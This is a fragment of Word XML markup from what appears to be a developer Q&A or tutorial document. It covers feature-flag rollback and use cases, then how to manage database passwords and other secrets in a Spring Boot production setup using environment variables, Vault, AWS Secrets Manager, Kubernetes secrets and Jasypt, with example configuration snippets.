        </w:rPr>
        <w:t xml:space="preserve"> Test both flag-enabled and flag-disabled scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8DDDF3"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Logging and Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Log flag state changes and monitor usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6988A697"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FED0F">
          <v:rect id="_x0000_i2916" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6BDDAD"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Rollback Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5724022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If a newly introduced feature causes issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B725C0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Disable the feature flag:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set the flag to false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40EFD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Monitor:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Check the logs and system stability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3E5557"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Rollback code (if needed):</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If disabling the flag does not resolve the issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655CA798"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625B3">
          <v:rect id="_x0000_i2917" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E966CE1"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDBB47A"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Gradual Rollouts:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enable features for a small percentage of users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A783C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A/B Testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run multiple versions of a feature concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3376A8B5"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Canary Releases:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enable the feature in a single environment before a full rollout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A32EB90"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Instant Rollback:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Turn off problematic features without redeploying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E83DBEA" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00000000" w:rsidP="00400C9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112849">
          <v:rect id="_x0000_i2918" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6398695C" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690EE7F4"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configuration files or environment variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for simple feature toggles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE56D4E"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database-driven toggles</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for more dynamic control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F383B"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>external feature flag services</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LaunchDarkly</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for complex scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163D02AF"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 xml:space="preserve">Integrate </w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FF4J</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you need a feature management console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C9F7C" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Properly handle feature flag changes and monitor performance to ensure smooth operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E66D435" w14:textId="77777777" w:rsidR="00013964" w:rsidRDefault="00000000" w:rsidP="0001396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CCCA4E">
          <v:rect id="_x0000_i2919" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E7BEFB" w14:textId="359193E6" w:rsidR="00013964" w:rsidRPr="00CE4B95" w:rsidRDefault="005452DC" w:rsidP="00F30CA9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="705" w:name="_Toc197867919"/>
      <w:r w:rsidRPr="005452DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to you handle secrets management security in Spring Boot application in Production environment example database passwords etc</w:t>
      </w:r>
      <w:r w:rsidR="00013964" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="705"/>
    </w:p>
    <w:p w14:paraId="324A879B" w14:textId="11665CA5" w:rsidR="006A6C4D" w:rsidRPr="006A6C4D" w:rsidRDefault="006A6C4D" w:rsidP="00A837C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Handling secrets (like database credentials, API keys, and certificates) securely in a Spring Boot application running in a </w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>production environment</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is critical to maintaining data integrity and preventing unauthorized access. Here are some best practices and methods to securely manage secrets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704119E6"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9EB636">
          <v:rect id="_x0000_i2920" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8B8F8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1. Use Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610E1B5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ore sensitive data as environment variables rather than hardcoding them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C992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Configuration in application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC22E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226367C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5A92480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l: jdbc:postgresql://${DB_HOST:localhost}:5432/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E196C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sername: ${DB_USER}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4162E5A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    password: ${DB_PASSWORD}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A120853"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Running the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D60FE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B_USER=admin DB_PASSWORD=secret123 java -jar app.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2CC9C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54461F2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imple and effective for non-containerized applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2124F9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vironment-specific configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2277F21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Drawbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8E2AE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an be exposed if environment variables are logged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F119B24"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F7C8">
          <v:rect id="_x0000_i2921" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4179943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2. Use Configuration Management Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7037B7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Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud Config</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consul</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vault</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> manage secrets centrally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B383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Using Spring Cloud Config with Vault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2627EA4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Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6454436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FAB499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org.springframework.cloud&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3933315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pring-cloud-starter-vault-config&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF9EB9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3DCFF72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Configure Vault (application.yml)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E49008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01A572A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loud:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432CABE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ult:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CC06C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i: http://localhost:8200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652CCC4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oken: s.PJ0nD0hX7mZh1q0grBpX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A553F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v:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9265C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abled: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5818C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application-name: myapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BA8633"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3: Store Secrets in Vault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBAFD1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ult kv put secret/myapp DB_USER=admin DB_PASSWORD=secret123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C156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4: Access Secrets in Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371ED32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DB_USER}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498159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username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49818DE3" w14:textId="77777777" w:rsidR="006A6C4D" w:rsidRPr="006A6C4D" w:rsidRDefault="006A6C4D" w:rsidP="006A6C4D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A2D083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DB_PASSWORD}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA2170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password;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71594B1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09A2A75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entralized management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB9E4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ynamic secret rotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F427E5"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EE760B">
          <v:rect id="_x0000_i2922" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAB39B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3. Use Secrets Management Services in Cloud Providers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1B37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WS Secrets Manager:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DEA6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ore secrets like database credentials in AWS Secrets Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A5BD1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AWS SDK Dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2254C1C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2899AFC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software.amazon.awssdk&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF934A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ecretsmanager&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35655F2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CFF4FE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Code to Access Secrets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A82AE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ublic String getSecret(String secretName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0381BFC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sManagerClient client = SecretsManagerClient.builder().build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7C89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GetSecretValueRequest request = GetSecretValueRequest.builder().secretId(secretName).build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6BCF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GetSecretValueResponse response = client.getSecretValue(request);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414B47F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return response.secretString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00147D1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1085B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6DE6C8E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ecure and managed by AWS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B6EE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utomatic secret rotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E7E27E"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0335B4B">
          <v:rect id="_x0000_i2923" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE8AE4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4. Kubernetes Secrets (for Containerized Apps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C729D9B"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1: Create a Secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1415058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kubectl create secret generic db-credentials \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0582953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from-literal=username=admin \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA3322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from-literal=password=secret123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C7CD7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2: Reference in Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2422639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piVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5652659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kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32109A1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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F33ED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spring-boot-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBE8E9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ec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4870A0C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emplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D3CF8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pec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE19F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ontainers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C7902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app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F1ACB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image: myapp:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7CABA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v:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D1C2B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DB_USER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B28B8C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lueFrom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1445AE9F"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KeyRef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5048B4D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db-credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104EAD5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ey: username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355BD70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 name: DB_PASSWORD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F547F1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lueFrom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079C1F2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secretKeyRef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B64ACF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name: db-credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304C01E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ey: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF1DF05"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5005B66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ecrets are mounted as environment variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06347E4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Managed by Kubernetes securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DDBF0A"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41F0D0">
          <v:rect id="_x0000_i2924" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F6BA87"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5. Use Jasypt for Encrypted Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5E82F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crypt sensitive data in application.yml using Jasypt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D41BB9"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1: Add Dependency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B384CB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39E2FCE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com.github.ulisesbocchio&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540C818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jasypt-spring-boot-starter&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED21BE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version&gt;3.0.4&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D85D438"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722B5E0E"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2: Encrypt Secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C426A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java -cp your-app.jar com.ulisesbocchio.jasyptspringboot.cli.StringEncryptorCLI encrypt \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B164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input="secret123" password="encryptionKey"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686189B0"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3: Store Encrypted Secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EC094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7A2C57D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12336AD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password: ENC(qGVoQk+lRB24MQ==)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995957D"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tep 4: Decryption Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A94B3C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java -Djasypt.encryptor.password=encryptionKey -jar app.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C1AB3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41D13EB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asy to integrate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1360742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Encrypts sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765515C5"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0279D">
          <v:rect id="_x0000_i2925" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39310E58"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6. Use HashiCorp Vault with Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A000F7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Securely store and access secrets with </w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HashiCorp Vault</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5E761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1: Add Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E42D3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lastRenderedPageBreak/>
        <w:t>&lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA8467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groupId&gt;org.springframework.cloud&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA32941"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lt;artifactId&gt;spring-cloud-starter-vault-config&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72720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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DB1CB"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2: Vault Configuration (application.yml):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EA692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53D0BDA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cloud:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A09A53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vault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F12E84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uri: http://localhost:8200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0365840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token: s.PJ0nD0hX7mZh1q0grBpX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68859AD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kv:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6890FAD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enabled: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF4362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application-name: spring-boot-app</w:t>
      </w:r>
